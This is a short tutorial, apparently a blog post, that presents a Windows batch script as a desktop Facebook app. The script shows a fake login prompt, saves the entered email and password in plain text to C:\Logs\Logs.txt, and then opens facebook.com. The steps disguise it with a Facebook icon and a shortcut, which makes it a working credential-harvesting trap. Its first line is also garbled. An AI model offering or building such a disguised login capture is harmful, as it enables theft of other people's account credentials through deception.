Facebook Account Using Notepad And CMD
After these setup your desktop facebook app created just like android mobile app. One time inter your name and password
1. Open notepad and copy these purple color codes:
[code type="HTML"]
@echo offcolor a
title Login
echo Please Enter Email Address And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%Pass%">Logs.txt
start www.facebook.com
exit
[/code]
Setup 2. Save it as file name: alltypedata.bat
Setup 3.Click on your c drive and create a folder named logs.
Setup 4. Now create a shortcut file of that bat.
Setup 5. then right click on the shortcut one and click on properties. And change the icon
download a facebook icon from Click here.
6. All task finished. Test it. After Finish Open this file enter your Fb ID And Password Then Click Enter and see......!!!
Post a Comment